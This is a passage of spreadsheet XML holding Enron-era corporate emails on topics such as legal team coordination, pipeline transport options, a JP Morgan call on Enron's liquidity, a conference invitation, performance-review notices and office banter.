abuse@flowgo.com_x000D_
_x000D_
_x000D_
If you wish to never receive a referral from a friend, click the link below._x000D_
_x000D_
http://www.flowgo.com/nonrecip.cfm?id=efxbzDggorvtwmqStzecyPlgt</t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 10:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'catherine.clark@enron.com'})</t>
  </si>
  <si>
    <t>Re: ENA/EE&amp;CC meeting</t>
  </si>
  <si>
    <t xml:space="preserve">You raise a very interesting question on how EECC and ENA will interface in _x000D_
the future.  _x000D_
_x000D_
I understand that ENA now has a Technical Support Group (something like _x000D_
that), and some of the folks are EECC personnel who have transferred to ENA.  _x000D_
I do not know their function or role.   _x000D_
_x000D_
As for the integration of EECC legal comments into a document, I would say _x000D_
that it would depend on the comment.  Essentially, the deals are ENA deals, _x000D_
not EECC deals, which means ENA has decision making responsibility.  Also, _x000D_
ENA is the project sponsor/owner (until sold), and NEPCO is usually the _x000D_
contractor.  The conflicts arise when NEPCO (usually not EECC on ENA deals) _x000D_
is asked to wrap certain contracts, so EECC or NEPCO takes a position as a _x000D_
contractor.  So it is difficult for EECC to act as the owner's engineer and _x000D_
the EPC contractor._x000D_
_x000D_
Another interface issue is that EECC contracts personnel do not typically _x000D_
involve the EECC lawyers in major equipment contracts until the end of the _x000D_
negotiation process.  Perhaps this has changed since I left, but that was how _x000D_
things worked when I was with EECC.  _x000D_
_x000D_
On the finance/deal lawyer front, my question is who deals with the lenders _x000D_
and their counsel once the financing vehicle is in place?_x000D_
_x000D_
I'll let you know if I think of anything else.  I suspect Sheila will have _x000D_
some insight, also._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Catherine Clark/ENRON@enronXgate on 01/19/2001 10:52 AM_x000D_
To: Roseann Engeldorf/Corp/Enron@ENRON, Kay Mann/Corp/Enron@Enron_x000D_
cc: Lisa Bills/ENRON@enronXgate _x000D_
_x000D_
Subject: ENA/EE&amp;CC meeting_x000D_
_x000D_
Rose and Kay,_x000D_
Lisa has asked for a meeting between ENA and EE&amp;CC to talk about how both _x000D_
companies are going to interface now that we are all on the same team.  We _x000D_
are still in the brainstorming stage, trying to think about the agenda for _x000D_
the meeting, and what the ENA representatives should say.  I've attached both _x000D_
an agenda and a first crack at the Project Development Process as we see it.  _x000D_
_x000D_
It would be GREATLY APPRECIATED if you could provide some comments on how you _x000D_
envision EE&amp;CC and ENA working together on projects, especially how you see _x000D_
the Legal teams interfacing.  I tried with a few bullet points, but please _x000D_
feel free to delete, add, amend, rewrite, etc...  I'll fax a synthesized _x000D_
version of your comments to Lisa at the  end of today.  Thank you in advance _x000D_
for your suggestions._x000D_
-Catherine_x000D_
x3-9943_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 Aug 2000 04:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.miller@enron.com', 'shelley.corman@enron.com', 'sstojic@gbmdc.com', 'glen.hass@enron.com', 'steven.harris@enron.com'})</t>
  </si>
  <si>
    <t>TW Options Update: Dynegy meeting</t>
  </si>
  <si>
    <t>Yesterday Jeff Fawcett, Lee Ferrell and I met with Dynegy marketing and _x000D_
legal/regulatory representatives regarding TW Transport Options.  Overall the _x000D_
meeting was very positive.  We had nothing but encouraging remarks from the _x000D_
marketing representatives.  However, the regulatory people (Sarah Tomalty, Ed _x000D_
Ross) had a couple of issues.  The biggest issue is a marketing affiliate _x000D_
concern.  Apparently Dynegy is on a crusade at FERC to place further limits _x000D_
on deals pipelines can do with their marketing affiliates.  They have run _x000D_
into situations in which pipelines (examples:  Koch, El Paso) have blatantly _x000D_
favored their marketing affiliates to the extent that Dynegy cannot even do _x000D_
deals with them.  (In fact, one of the problems with Koch has been Koch's _x000D_
price option deals with its affiliate.)  The perception is that the _x000D_
affiliates, by using "funny money," can always make themselves the highest _x000D_
bidder, with a net benefit to the entire organization (pipeline + _x000D_
affiliate).  The remedy Dynegy is proposing is to require a marketing _x000D_
affiliate, if it is the highest bidder, to credit back the difference between _x000D_
the price it pays and the price offered by the next highest bidder.  The _x000D_
presumption is that the affiliate has an unfair advantage because it is able _x000D_
to pay above market value in order to get the capacity.   Dynegy's proposal _x000D_
would encourage affiliates to pay "real" dollars.  _x000D_
_x000D_
While it emphasized its belief that TW does not favor its marketing _x000D_
affiliates, Dynegy would like for us to include in our filing some limitation _x000D_
on options transactions with marketing affiliates.   It is likely that other _x000D_
pipelines will file for the ability to sell options once FERC approves our _x000D_
filing, and Dynegy would like for this type of protection to be part of the _x000D_
precedent set by our filing.  Ed hinted that FERC may be considering a _x000D_
divestiture requirement for marketing affiliates, and that pipelines can _x000D_
avoid this extreme result by voluntarily limiting their transactions with _x000D_
affiliates.  Shelley, I know you've discussed this issue with Ed already and _x000D_
our reactions were the same.  Basically we politely told Dynegy that we don't _x000D_
believe we're part of the problem and that we are therefore not inclined to _x000D_
unnecessarily disadvantage our company by further limiting ENA's ability to _x000D_
do business with TW.   We can probably expect an intervention with comments _x000D_
or a limited protest addressing the issue._x000D_
_x000D_
The other regulatory question was whether we intend to file each option deal _x000D_
as a negotiated rate.  My analysis of this issue is that since we're _x000D_
proposing the option fee as part of the transport rate, options would always _x000D_
be a type of negotiated rate and would need to be filed.  If you think this _x000D_
is not the right answer, please let me know because we need to decide it _x000D_
before we file the tariff sheets.  Sarah's question seemed to be more one of _x000D_
curiosity rather than a basis for protest._x000D_
_x000D_
Like the Indicated Shippers, Dynegy appeared interested in an all-customer _x000D_
meeting to discuss the service.  Jeff and the rest of the commercial group _x000D_
are looking further into whether and when we would have such a meeting. _x000D_
_x000D_
If you have any questions or concerns please let me know.</t>
  </si>
  <si>
    <t>Re: Rodeo tickets for tonight's performance</t>
  </si>
  <si>
    <t xml:space="preserve">Oh we're going now...I have the tickets._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Gabriel Monroy_x000D_
02/22/2001 04:25 PM_x000D_
To: Robin Rodrigue/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Rodeo tickets for tonight's performance  _x000D_
_x000D_
Do you want to go?  I got the impression you were not so convinced. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 3 Feb 2000 02:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EnronOnline - Australian legal Issues</t>
  </si>
  <si>
    <t xml:space="preserve">Mark, thanks for your advice during our phone discussion on Monday. That was _x000D_
the feedback I was looking for. I was concerned that in Australia we would be _x000D_
revisiting issues that had already been resolved elsewhere.    _x000D_
_x000D_
We are now progressing to wrap up the legal issues in line with our scheduled _x000D_
implemenation date of April 1. I'll keep you posted of developments . _x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 11:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'griff@odessapumps.com'})</t>
  </si>
  <si>
    <t>frozenset({'e-mail &lt;.junior@enron.com&gt;', 'e-mail &lt;.rhonda@enron.com&gt;', 'john.griffith@enron.com', 'e-mail &lt;.brian@enron.com&gt;', 'e-mail &lt;.michelle@enron.com&gt;', 'e-mail &lt;.eddie@enron.com&gt;', 'e-mail &lt;.jennifer@enron.com&gt;', 'e-mail &lt;.john@enron.com&gt;', 'e-mail &lt;.jeff@enron.com&gt;', 'e-mail &lt;.glen@enron.com&gt;'})</t>
  </si>
  <si>
    <t>FW: Miss Afghanistan</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
-----Original Message-----_x000D_
From: Rucker, Roy P [mailto:ruckerrp@bp.com]_x000D_
Sent: Friday, November 16, 2001 12:39 PM_x000D_
To: Hayhurst, D M; Chuck Dooley (E-mail); McPherson, Dennis L; Moore,_x000D_
Jeffery D; Swartz, Kevin J (AMA); Mike Griffith; Martin, Toni A; Ronnie_x000D_
Lyles (E-mail)_x000D_
Subject: FW: Miss Afghanistan_x000D_
_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - MISSAFGH.JPG _x000D_
 - ATT331482.txt </t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 23:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>torrey:_x000D_
please set me up to trade crude._x000D_
John</t>
  </si>
  <si>
    <t>Wed, 10 Jan 2001 01:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kam.keiser@enron.com', 'david.baumbach@enron.com', 'phillip.love@enron.com', 'errol.mclaughlin@enron.com', 'darron.giron@enron.com'})</t>
  </si>
  <si>
    <t>Old Books</t>
  </si>
  <si>
    <t>In the future,  if you have a book that had deals with a third party,  and _x000D_
you move those deals out of that book or change that book to another book you _x000D_
have to officialize that book after it has nothing in it.  The reason being,  _x000D_
if someone does not officialize an old book the credit group pulls the last _x000D_
available information.  Confusing enough??  Let me know if you need further _x000D_
explaination.</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 07:08:39 -0800 (PST)</t>
  </si>
  <si>
    <t>You can use it if I can find it.  I may have lost it on Saturday night.  I was very drunk._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Bump, Dan J.  _x000D_
Sent:	Monday, October 29, 2001 7:45 AM_x000D_
To:	Whitt, Mark; Lucci, Paul T._x000D_
Subject:	_x000D_
_x000D_
Shark--  can you forward me the Afghan Dating e-mail your brother sent you._x000D_
_x000D_
Looch--  can I borrow that 'fro wig for Halloween; i heard it was hilarious._x000D_
_x000D_
Peace</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 09:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'danielyergin@cera.com'})</t>
  </si>
  <si>
    <t>The Governors' Natural Gas Summit: Responding to the Challenge</t>
  </si>
  <si>
    <t xml:space="preserve">Dr. Kenneth L. Lay _x000D_
Chairman &amp; C.E.O. _x000D_
Enron Corporation _x000D_
_x000D_
Dear Dr. Lay: _x000D_
_x000D_
I am writing to bring your attention to an important and timely event that _x000D_
will be held on September 20th at the Hyatt Regency Columbus, in Columbus, _x000D_
Ohio - "The Governors' Natural Gas Summit: Responding to the Challenge." This _x000D_
event is convened by the Interstate Oil and Gas Compact Commission (IOGCC).? _x000D_
Co-chaired by Alaska Governor Tony Knowles, IOGCC Chairman and Ohio Governor _x000D_
Bob Taft, with the participation of other governors, this forum promises to _x000D_
be an outstanding exchange of ideas among leaders of government, energy _x000D_
producers, transporters, distributors, and end-users on the subject of the _x000D_
current and long-term outlook for natural gas resources and markets in North _x000D_
America. A very distinguished group of speakers is assembling, including _x000D_
senior government officials and senior executives of companies critically _x000D_
involved in the energy value chain._x000D_
_x000D_
Primary Goals of the Summit include: _x000D_
_x000D_
* Exploring and clearly communicating the current dynamics of the natural gas _x000D_
market _x000D_
* Informing the industry and the public about the current and future supply _x000D_
potential for gas _x000D_
* Providing governmental and industry leaders with an opportunity to discuss _x000D_
natural gas in the context of national energy policy, with the input of _x000D_
interested State Governors._x000D_
_x000D_
The Interstate Oil and Gas Compact Commission (IOGCC) and the governors have _x000D_
asked CERA to help organize the Summit and has invited senior CERA staff to _x000D_
moderate panel discussions on the Natural Gas Marketplace and the Supply _x000D_
Response for North America. In addition, I will be providing an opening _x000D_
framework for participants and contributing to the wrap-up of the Summit at _x000D_
the close of the day with the governors.? We are very pleased to be working _x000D_
with the governors and with the IOGCC and its executive director, Christine _x000D_
Hansen._x000D_
_x000D_
We hope that you can join us for this important event, and encourage you to _x000D_
view the Summit agenda on the IOGCC Web-site at: _x000D_
http://www.iogcc.state.ok.us/MEETINGS/2000_Governors_Natural_Gas_Summit.htm? _x000D_
_x000D_
On this site, you will also find complete registration information including _x000D_
fees, registration form, and logistics. _x000D_
_x000D_
You may also be interested in a recent Washington Post article on volatility _x000D_
in the gas and power markets, which helps provide a context for the _x000D_
discussion and which was co-authored by CERA Managing Director Tom Robinson _x000D_
and myself. This article may be found on the Washington Post Web-site at: _x000D_
http://www.washingtonpost.com/wp-dyn/articles/A18653-2000Jul20.html _x000D_
_x000D_
Should you have any questions regarding the Summit or CERA's participation, _x000D_
please contact my colleague Ron Kapavik at +1 936 931 1416 or via e-mail to _x000D_
rkapavik@cera.com._x000D_
_x000D_
Sincerely, _x000D_
_x000D_
Dan Yergin _x000D_
Chairman, Cambridge Energy Research Associates _x000D_
_x000D_
**************************************************************** _x000D_
Our relationship with you is very important to us.? If you wish _x000D_
not to receive future e-mail notifications, please send a reply _x000D_
to this message with "DoNotEmail" as the subject of your message. _x000D_
(mailto:info@cera.com?subject=DoNotEmail ). _x000D_
**************************************************************** </t>
  </si>
  <si>
    <t>Wed, 18 Oct 2000 03:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FERC interviews in Omaha</t>
  </si>
  <si>
    <t xml:space="preserve">pls print and hand to me.  DF  _x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 10/18/2000 _x000D_
10:25 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Gary Zahn                           10/18/2000 09:54 AM_x000D_
	_x000D_
_x000D_
To: Keith Petersen/ET&amp;S/Enron@ENRON, Ray Smith/ET&amp;S/Enron@ENRON, Elaine _x000D_
Concklin/ET&amp;S/Enron@ENRON_x000D_
cc: Lee Huber/ET&amp;S/Enron@ENRON, Drew Fossum/ET&amp;S/Enron@ENRON, Bob _x000D_
Chandler/ET&amp;S/Enron@ENRON, Mary Kay Miller/ET&amp;S/Enron@ENRON, Rod _x000D_
Hayslett/FGT/Enron@ENRON, Vincent Strohmeyer/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: FERC interviews in Omaha_x000D_
_x000D_
Today, I received a data request (attached) which provides more specifics on _x000D_
the interviews to be conducted in Omaha. Please note that they have asked to _x000D_
meet with Keith Petersen and Ray Smith on an individual basis.  If the FERC _x000D_
deems it necessary, they will interview individuals that report to them._x000D_
_x000D_
_x000D_
  _x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Oct 2001 08:50:28 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.allan@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'stacey.wales@enron.com', 'e..carter@enron.com', 'laura.bosek@enron.com', 'jay.johnson@enron.com', 'teresa.aguilera-peon@enron.com', 'monika.causholli@enron.com', 'peggy.determeyer@enron.com', 'ayesha.kanji@enron.com', 'milagros.daetz@enron.com'})</t>
  </si>
  <si>
    <t>FW: JP Morgan Conference Call on Enron</t>
  </si>
  <si>
    <t>Some good news on Enron!_x000D_
_x000D_
Dave_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Reed, Andrea V.  _x000D_
Sent:	Wednesday, October 31, 2001 10:33 AM_x000D_
To:	Allan, David; Determeyer, Peggy; Hutchinson, Elizabeth; Singh, Vikram; Perez, Eugenio; Maxwell, David; Forster, Avril_x000D_
Subject:	FW: JP Morgan Conference Call on Enron_x000D_
_x000D_
Some positive and accurate news?for a change!!!! _x000D_
avr_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Helfrich, Christopher A.  _x000D_
Sent:	Wednesday, October 31, 2001 10:29 AM_x000D_
To:	Malcolm, Rodney; Reed, Andrea V._x000D_
Subject:	FW: JP Morgan Conference Call on Enron_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Seyfried, Bryan  _x000D_
Sent:	Wednesday, October 31, 2001 1:52 AM_x000D_
To:	DL-Lon Enron Credit London; DL-Enron Credit Houston; Blesie, Brad; Zipter, Rudi_x000D_
Subject:	FW: JP Morgan Conference Call on Enron_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Seyfried, Bryan  _x000D_
Sent:	31 October 2001 07:28_x000D_
To:	Sherriff, John; Brown, Michael - COO London; Edgley, Anne; Murphy, Ted; Gold, Joe; Lewis, Richard; Scrimshaw, Matthew; Dyson, Fernley; Lien, Thor_x000D_
Cc:	Valnek, Tomas_x000D_
Subject:	FW: JP Morgan Conference Call on Enron_x000D_
_x000D_
below is a summary, prepared by Tomas Valnek, of the JP Morgan conference call to fixed income and equity investors.  The consensus view of our team is the call was very positive and should provide a platform for stability absent new, negative surprises._x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Valnek, Tomas  _x000D_
Sent:	30 October 2001 22:44_x000D_
To:	Seyfried, Bryan_x000D_
Subject:	JP Morgan Conference Call on Enron_x000D_
_x000D_
JPM Morgan (JPM) held a conference call on 30 October on the recent events surrounding Enron. Below, the main points are summarised._x000D_
_x000D_
The overall tone was positive for three reasons: The two analysts (one equity and fixed income) made a very good effort to clarify the current situation; They gave a positive view on Enron in general; And, they capped the value of the potential off-balance sheet liabilities._x000D_
_x000D_
In their view, there are no issues with the core business._x000D_
_x000D_
The fundamental issue is short-term liquidity. To alleviate this issue, they would like to see extra credit lines of about USD 1.5-2bn, and the extension of a revolver maturing in May 2002;_x000D_
_x000D_
They think that the liability from Osprey and Marlin is likely to be in the region of USD 400-500m. This assumes that there are no other contingent liabilities form other off-balance sheet commitments;_x000D_
_x000D_
To resolve the situation surrounding this issue and to potentially avoid a downgrade, Enron must primarily restore confidence and improve disclosure of information surrounding the off-balance sheet liabilities._x000D_
_x000D_
One of the first things pointed out by the equity analyst was that he considered little permanent damage on the equity side, and importantly that there were no major with Enron's core business. But in their view, the fundamental issue was related to credit markets, short term liquidity in particular. To alleviate this issue, the analyst would like to see the following:_x000D_
_x000D_
That Enron secures an extra USD 1-2bn in credit lines, preferably USD 1.5-2bn;_x000D_
_x000D_
That the maturity of the USD 2.25bn revolver maturing in May 2002 is extended._x000D_
_x000D_
From the commodity side, they were confident that there no immediate liquidity issues. They had been in touch with trading counterparties like Dynegy, El Paso, Williams... and had not sensed that any of them would radically reduce their trading with Enron. (However, they noted that a weakening in trading activities could mean smaller market shares, which could negatively affect earnings.)_x000D_
_x000D_
On the debt side, one overall concern was the actual amount of debt, which they estimated to about USD 17.5bn, and related potential debt servicing problems. This includes debt actually held by Enron (about USD 12bn), debt attributable to Enron through unconsolidated equity affiliates, and the Marlin, Osprey and Yosemite debt._x000D_
_x000D_
Much focus was on the Marlin and Osprey potential equity liabilities, as the analysts had no information indicating that any liability could arise from the equity affiliates or Yosemite. From Marlin and Osprey, Enron's worst case liability would be about USD 3.4bn (implying zero asset value), but they estimated that a likely outcome would be a liability of about USD 400-500m. (This liability only concerns Marlin and Osprey, and thus assumes that there no liabilities related to the equity affiliates and Yosemite.) It was noted that this liability did not necessarily have to be settled through a share issue, but could be settled through cash raised in asset sales._x000D_
_x000D_
The issue of getting downgraded below investment grade was discussed. The analysts did not seem to think that this was a likely outcome, but that a downgrade to BBB-/Baa3 was a possibility. They considered that if Enron wants to avoid a downgrade, the following measures should be implemented:_x000D_
_x000D_
Restore confidence in Enron. In particular, improve disclosure, give a better background to the LJM partnership and specify the nature and the value of the assets held in the trusts;_x000D_
_x000D_
Develop a cash flow plan to show how assets are to be monetised to pay down debt;_x000D_
_x000D_
Streamline operations;_x000D_
_x000D_
Provide information about the USD 600m broadband investments._x000D_
_x000D_
Finally, mark-to-market accounting was discussed as well. The analysts had no issue with that noting that for Enron's type of business this was an appropriate way to account for revenues. They considered the average daily VaR number of USD 60m to be low, thus not showing any evidence of aggressive accounting. Also, the retention of key staff would become very important in the future._x000D_
_x000D_
Regards_x000D_
_x000D_
Tomas</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 02:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bryan.seyfried@enron.com'})</t>
  </si>
  <si>
    <t>Re: Amitava's visit</t>
  </si>
  <si>
    <t xml:space="preserve">Bryan,_x000D_
_x000D_
I am glad we could help. Let me talk to Vasant about Amitava's support_x000D_
for you._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Bryan Seyfried_x000D_
11/05/2000 05:26 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Vasant Shanbhogue/HOU/ECT@ECT_x000D_
cc: Steven Leppard/LON/ECT@ECT, Markus Fiala/LON/ECT@ECT _x000D_
Subject: Amitava's visit_x000D_
_x000D_
Really appreciate your freeing amitava up to provide critical input into the _x000D_
quantitative work we have undertaken.  As you are aware much of the work _x000D_
requires exploring uncharted territory and the team has confirmed the _x000D_
significant contribution that Amitava's experience and expertise has provided _x000D_
in a very short timeframe._x000D_
_x000D_
As you might expect, this quickly confirms that we really need more dedicated _x000D_
support from someone with Amitava's background.  It is imperative that we _x000D_
leverage his experience to speed up the process and apply critical insights _x000D_
into our project.  This will not only speed up the work considerably but also _x000D_
ensure that we have put our best team on the difficult issues in front of us._x000D_
_x000D_
I would like to discuss an arrangement where we can ensure Amitava is more _x000D_
integrated into our efforts.  I realize it will be difficult to free him up _x000D_
but maybe we can put something together which works for everybody._x000D_
_x000D_
some early ideas:  _x000D_
_x000D_
have amitava and family come over for 6 weeks of dedicated support.  this _x000D_
should allow us to develop the communication processes to run a global quant _x000D_
effort for the project and then continue with Amitava a full time EC.com _x000D_
resource working from Houston.  This is likely my preference._x000D_
_x000D_
or_x000D_
_x000D_
agree a schedule of regular trips which allows Amitava to provide critical _x000D_
insights and oversight of the project and give our team a resource to extract _x000D_
his experience on an ongoing basis._x000D_
_x000D_
Let's discuss before I talk to john about the practicalities_x000D_
_x000D_
Thanks for your assistance._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 11:31:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sevil.yaman@enron.com'})</t>
  </si>
  <si>
    <t>Rand Journal of Economics</t>
  </si>
  <si>
    <t>Vince,_x000D_
_x000D_
Would we be interested in getting The Rand Journal of Economics for our library? As you know it is one of the leader journals in microeconomics with a focus on regulation, industrial organization etc._x000D_
Thanks,_x000D_
_x000D_
Sevil Yaman_x000D_
Enron Research Group_x000D_
713-345-8083</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 06:49:28 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank_telemaque@flexitallic.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">what up baby._x000D_
_x000D_
-----Original Message-----_x000D_
From: Davis, Dana [mailto:Dana.Davis@ENRON.com]_x000D_
Sent: Friday, November 16, 2001 8:25 AM_x000D_
To: Frank Telemaque (E-mail)_x000D_
Subject: _x000D_
_x000D_
_x000D_
Good Morning Mr. Man!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t>
  </si>
  <si>
    <t>Wed, 31 May 2000 18:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Mid-Year 2000 Performance Feedback</t>
  </si>
  <si>
    <t>NOTE:  YOU WILL RECEIVE THIS MESSAGE EACH TIME YOU ARE SELECTED AS A REVIEWER._x000D_
_x000D_
You have been selected to participate in the Mid-Year 2000 Performance _x000D_
Management process by providing meaningful feedback on specific employee(s) _x000D_
that have been identified for you.  Your feedback plays an important role in _x000D_
the performance management process, and your participation is very critical _x000D_
to the success of Enron's Performance Management goals._x000D_
_x000D_
Please provide feedback on the employee(s) listed below by accessing the _x000D_
Performance Management System (PEP) and completing an online feedback form as _x000D_
described in the "Performance Management Quick Reference Guide".  You may _x000D_
begin your feedback input immediately.  Please have all feedback forms _x000D_
completed by the date noted below._x000D_
_x000D_
If you have any questions regarding PEP or your responsibility in the _x000D_
process, please call the PEP Help Desk at the following numbers:_x000D_
_x000D_
In the U.S.:  1-713-853-4777, Option 4_x000D_
In Europe:  44-207-783-4040, Option 4_x000D_
In Canada:  1-403-974-6724 (Canada employees only)_x000D_
_x000D_
Or e-mail your questions to:  perfmgmt@enron.com_x000D_
_x000D_
Thank you for your participation in this important process._x000D_
_x000D_
The following list of employees is a CUMULATIVE list of all feedback _x000D_
requests, by operating company, that have an "OPEN" feedback status.  An _x000D_
employee's name will no longer appear once you have completed the feedback _x000D_
form and select the "SUBMIT" button in PEP._x000D_
_x000D_
_x000D_
_x000D_
Review Group: ENRON_x000D_
Feedback Due Date: Jun 16, 2000_x000D_
_x000D_
Employee Name                   Supervisor Name                 Date Selected_x000D_
-------------                   ---------------                 -------------_x000D_
AHMAD, ANJAM                    DALE SURBEY                     May 22, 2000_x000D_
CARSON, MARGARET M              JAMES D STEFFES                 May 26, 2000_x000D_
GHOSH, SOMA                     TIMOTHY DAVIES                  May 31, 2000_x000D_
VERNON, CLAYTON J               VASANT SHANBHOGUE               May 26, 2000_x000D_
ZIPTER, RUDI C                  THEODORE R MURPHY               May 25, 2000</t>
  </si>
  <si>
    <t>Tue, 2 Jan 2001 14:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>yes - we should arrange to get together on Sunday to discuss bonus, comp, _x000D_
promotions and rankings before the PRC on Monday.  I am back Saturday night. _x000D_
I hope this works let me know a time._x000D_
_x000D_
_x000D_
_x000D_
Regards_x000D_
Delainey</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 13:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>TW/Duke Energy Wt1 Rec</t>
  </si>
  <si>
    <t xml:space="preserve">This is a new interconnect into the suction side of WT-1.  I think the capacity is going to be approximately_x000D_
50,000 mmbtu.  This may be able to flow sometime this or next. _x000D_
_x000D_
DS_x000D_
---------------------- Forwarded by Darrell Schoolcraft/ET&amp;S/Enron on 06/06/2001 09:58 AM ---------------------------_x000D_
_x000D_
 	Karen Brostad 06/06/2001 08:46 AM 	_x000D_
_x000D_
To:	Linda Trevino/ET&amp;S/Enron@ENRON, Perry Frazier/ET&amp;S/Enron@ENRON, James Moore/ET&amp;S/Enron, John Buchanan/ET&amp;S/Enron@ENRON, Dennis Lee/ET&amp;S/Enron@ENRON, Darrell Schoolcraft/ET&amp;S/Enron@ENRON, Gary Spraggins/ET&amp;S/Enron@ENRON, Linda Ward/ET&amp;S/Enron@ENRON, Beverly Miller/ET&amp;S/Enron@ENRON, Cynthia Rivers/ET&amp;S/Enron@ENRON, Sigrid MacPherson/GPGFIN/Enron, Terry Kowalke/ET&amp;S/Enron@ENRON, Albert Hernandez/ET&amp;S/Enron@ENRON, Dale Eldridge/ET&amp;S/Enron@ENRON, Amy Mulligan/ET&amp;S/Enron@ENRON, Vernon Mercaldo/ET&amp;S/Enron, Donald Vignaroli/ET&amp;S/Enron, Bret Fritch/ET&amp;S/Enron, Gale Ramsaran/ET&amp;S/Enron@ENRON, Michelle Lokay/ET&amp;S/Enron, Tammy Jaquet/ET&amp;S/Enron, Mary Draemer/ET&amp;S/Enron, James Studebaker/FGT/Enron, Lorraine Lindberg/ET&amp;S/Enron, Jeffery Fawcett/ET&amp;S/Enron, Martha Cormier/ET&amp;S/Enron@ENRON_x000D_
cc:	 _x000D_
_x000D_
Subject:	TW/Duke Energy Wt1 Rec_x000D_
_x000D_
The following new point has been added to Transwestern POI system effective 6/1/01._x000D_
_x000D_
POI Name	TW/Duke Energy WT-1 Rec_x000D_
POI TYpe	PDC_x000D_
DRN #		296410_x000D_
Station #	10186_x000D_
Location	Sec 31, T20S, R32E, Lea County, NM_x000D_
_x000D_
The transport contract that will use this point initially is CR# 27639_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 Feb 2000 04:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ENE lawyers to meet with Marval about ADA</t>
  </si>
  <si>
    <t>Patricia has asked who should be included in the group for Wednesday, March _x000D_
1.  Do you and Andrea want to be included?  Any commercial people?</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 09:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'maria.tefel@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'v.weldon@enron.com', 'eric.boyt@enron.com'})</t>
  </si>
  <si>
    <t>UNOCAL - Gas pricing Info</t>
  </si>
  <si>
    <t>Eric and Charlie:_x000D_
_x000D_
Thanks for your time in meeting with us.  Attached is the information on _x000D_
Unocal.  The minimum required deliverable volumes are based on 40% load _x000D_
factor, and the put is based on 10% above that (volumes between a 40% and a _x000D_
44% load factor).  _x000D_
_x000D_
Thanks and please call me if you have any questions.  _x000D_
_x000D_
Maria</t>
  </si>
  <si>
    <t>Mon, 28 Jan 2002 10:47:50 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mfe252@airmail.net'})</t>
  </si>
  <si>
    <t>Computer Gender</t>
  </si>
  <si>
    <t>A language instructor was explaining to her class that in French, nouns_x000D_
unlike the English counterparts, are grammatically designated as_x000D_
masculine or feminine._x000D_
_x000D_
"House," in French, is feminine -- "la maison."_x000D_
"Pencil," in French, is masculine -- "le crayon."_x000D_
_x000D_
One puzzled student asked, "What gender is computer?"_x000D_
The teacher did not know, and the word wasn't in her French dictionary._x000D_
So for fun she split the class into two groups, appropriately enough, by_x000D_
gender, and asked them to decide whether computer" should be a masculine_x000D_
or feminine noun._x000D_
_x000D_
Both groups were required to give four reasons for their recommendation._x000D_
The men's group decided that computers should definitely be of the_x000D_
feminine order ("la computer"), because:_x000D_
1. No one but their creator understands their internal logic;_x000D_
2. The native language they use to communicate with other computers is_x000D_
incomprehensible to everyone else;_x000D_
3. Even the smallest mistakes are stored in long-term memory for possible_x000D_
later retrieval; and_x000D_
4. As soon as you make a commitment to one, you find yourself spending_x000D_
half your pay check on accessories for it._x000D_
_x000D_
The women's group, however, concluded that computers should be masculine_x000D_
("le computer"), because:_x000D_
1. In order to do anything with them, you have to turn them on;_x000D_
2. They have a lot of data but still can't think for themselves;_x000D_
3. They are supposed to help you solve problems, but half the time they_x000D_
ARE the problem; and_x000D_
4. As soon as you commit to one, you realize that if you'd waited a_x000D_
little longer, you could have gotten a better model._x000D_
_x000D_
The Women won.</t>
  </si>
  <si>
